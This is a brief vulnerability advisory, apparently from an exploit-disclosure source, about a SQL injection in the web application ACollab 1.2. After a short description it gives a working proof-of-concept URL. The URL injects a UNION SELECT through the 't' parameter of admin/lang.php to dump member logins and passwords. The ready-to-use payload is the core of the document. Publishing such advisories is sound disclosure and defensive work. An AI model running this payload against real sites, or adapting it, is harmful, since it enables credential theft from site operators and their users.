------------------------------------------------------------------------
Software................ACollab 1.2
Vulnerability...........SQL Injection
Download................http://atutor.ca/acollab/
Release Date............1/31/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--Description--

An SQL injection vulnerability in ACollab 1.2 can be exploited to
retrieve a list of usernames and passwords. Because the malicious
string is stored in the session it may be necessary to refresh the page.


--PoC--
http://localhost/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a